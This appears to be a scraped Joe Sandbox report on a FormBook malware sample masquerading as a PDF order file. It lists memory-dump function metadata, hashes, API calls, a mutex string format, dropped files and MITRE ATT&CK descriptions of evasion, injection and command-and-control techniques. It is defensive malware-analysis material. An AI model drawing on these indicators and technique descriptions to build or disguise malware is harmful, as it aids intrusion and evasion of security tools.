Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 67ae14bdacfee49f6d461c49b62f551b1f345643d46fbf507311757a9f67c880
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 58919A70E402169FDF24DF99C8866BEB7A9EF44710F14457AE855E72D0E730E96087D0

Function 04969126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 04969191
@, xrefs: 04969175

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: f152d63901466cb9db1788066ff565bf67ed736f67b1bd05aaa54fc2205d16ae
Instruction ID: a4815fadfecf620be5a00ed5a068b918b0ac8b5d7fbc06f5b1061b5374e60b19
Opcode Fuzzy Hash: f152d63901466cb9db1788066ff565bf67ed736f67b1bd05aaa54fc2205d16ae
Instruction Fuzzy Hash: 21811BB1D002699BDB31DF54CD44BEEB7B8AB48714F1141EAA919B7240E7306E85CFA1

Function 00A05490 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80040111,?), ref: 00A055D9

Part of subcall function 00A033F9: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A03431
Part of subcall function 00A033F9: DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00A03443
Part of subcall function 00A033F9: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A0346A

RoOriginateErrorW.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80070057,00000012,?), ref: 00A05616

Strings

activatibleClassId, xrefs: 00A055FE

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: ErrorLockOriginateShared$AcquireDecodePointerRelease
String ID: activatibleClassId
API String ID: 3068322146-2691401494
Opcode ID: 3103e7ea41e81e3a0680204764b5e086ff5f82b2774844419398b624ac42d7dc
Instruction ID: f91dd5be3e8db0c68691de252676d807eb3b1d50a702ea2ab4852de69d6b6f1d
Opcode Fuzzy Hash: 3103e7ea41e81e3a0680204764b5e086ff5f82b2774844419398b624ac42d7dc
Instruction Fuzzy Hash: A1415C71E1061CEBDB14DFA4EC44AAFB7BAFF48710F154015E806A7291DB71AD02CBA0

Function 00A04751 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040,?,00000000,00000000), ref: 00A04771
CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001,?,?,?,?,?,00000000), ref: 00A047A5

Part of subcall function 00A046CA: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,00A02B21,00000000,?,?), ref: 00A046DA
Part of subcall function 00A046CA: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,00A02B21,00000000,?,?), ref: 00A046E9

Strings

Local\SM0:%d:%d:%hs, xrefs: 00A04778

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: ErrorLast$CreateCurrentMutexProcess
String ID: Local\SM0:%d:%d:%hs
API String ID: 779401067-4162240545
Opcode ID: 6bb5ac0c9b38c10b61a9c078f3045e7e55ca2bf979f141a2092a37ba52bb3ac5
Instruction ID: 374b0b1078f600ef576c4df901040a46718155ce459e749f183a7bfc1583241f
Opcode Fuzzy Hash: 6bb5ac0c9b38c10b61a9c078f3045e7e55ca2bf979f141a2092a37ba52bb3ac5
Instruction Fuzzy Hash: AA41D6B1E0023CA7CB21DB64ED89BEA7779BB58740F104595F909A72C1DB709E45CBD0

Function 00A023BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetModuleHandleExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000006,?,?), ref: 00A023FB
GetModuleFileNameA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,00000104), ref: 00A0243A

Strings

Vu, xrefs: 00A023FB

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: Module$FileHandleName
String ID: Vu
API String ID: 4146042529-807871483
Opcode ID: ae3f7bc0a0cf2f3913796c5cd3a11fa4e405eafdb3206cc191d8fa09a6d99493
Instruction ID: 2c9668ed022df22b78f11449209ba2bc027bf699e66dc1469897a7c19185b216
Opcode Fuzzy Hash: ae3f7bc0a0cf2f3913796c5cd3a11fa4e405eafdb3206cc191d8fa09a6d99493
Instruction Fuzzy Hash: 9221F531A0032D9BCF28CF55EC88BEA77B8AF55704F0441A9D98AD7181DBB19E85CF90

Function 00A02E62 Relevance: 5.0, APIs: 4, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,?,00A04B2F,?,00000000,00000000,?,?,?,00000000,?), ref: 00A02E80
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00A048A0,?,?,?,?,00000000), ref: 00A02E87
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00A04B2F,?,00000000,00000000,?,?,?,00000000,?,?,?,00A048A0), ref: 00A02EA5
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00A048A0,?,?,?,?,00000000), ref: 00A02EAC

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: f288f51062cdc98bba80dda6e0ea7ba36a5e2fdb6e17892bce691b757c16afdc
Instruction ID: df4c923c9326d9f5382fe637ce47a8f058de4f7b511de723b39f57988ba1f3ba
Opcode Fuzzy Hash: f288f51062cdc98bba80dda6e0ea7ba36a5e2fdb6e17892bce691b757c16afdc
Instruction Fuzzy Hash: CBF04F72210215AFDB14CFA1EC88BA6BBF8FF48312F110529F241C6090D7B5E996CBA0

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ORDER_1105-19-24-3537.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER_1105-19-24-3537.pdf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hgicnxu.ib1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_euyhdxbb.nec.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mluqbrvl.cef.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yn1wx24b.cff.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
ORDER_1105-19-24-3537.pdf.exe

Function 05276630 Relevance: 1.8, Strings: 1, Instructions: 536
COMMON

Function 05276640 Relevance: 1.8, Strings: 1, Instructions: 533
COMMON

Function 07610DD4 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Function 07610DE0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0107ADA8 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Function 010744B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre